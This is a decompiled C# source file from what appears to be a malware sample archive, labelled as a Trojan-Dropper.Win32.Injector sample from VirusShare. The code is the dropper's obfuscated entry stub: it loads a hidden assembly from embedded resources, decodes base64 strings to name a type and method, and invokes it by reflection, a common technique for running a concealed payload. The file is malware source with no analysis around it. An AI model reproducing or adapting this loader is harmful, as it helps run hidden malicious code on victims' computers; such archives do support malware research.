MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.exwr-69a114df5525bb71f18484f15cb4dd44f7c416f26c41b8af17d2ce1b2774383e/.cs
2022-08-18 06:28:56 -05:00

21 lines
853 B
C#

// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Feon, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: AF8034ED-5A2C-4122-9E1B-F560737FA983
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.exwr-69a114df5525bb71f18484f15cb4dd44f7c416f26c41b8af17d2ce1b2774383e.exe
using Feon.Properties;
using System;
using System.Text;
internal sealed class \uE000
{
static \uE000() => \uE009.\uE000();
private static void Main() => \uE000.\uE000();
private static void \uE000() => AppDomain.CurrentDomain.Load(Resources.\uE001).GetType(\uE000.\uE001(\uE008.\uE000(0))).GetMethod(\uE000.\uE001(\uE008.\uE000(29))).Invoke((object) null, (object[]) null);
public static string \uE001(string _param0) => Encoding.UTF8.GetString(Convert.FromBase64String(_param0));
}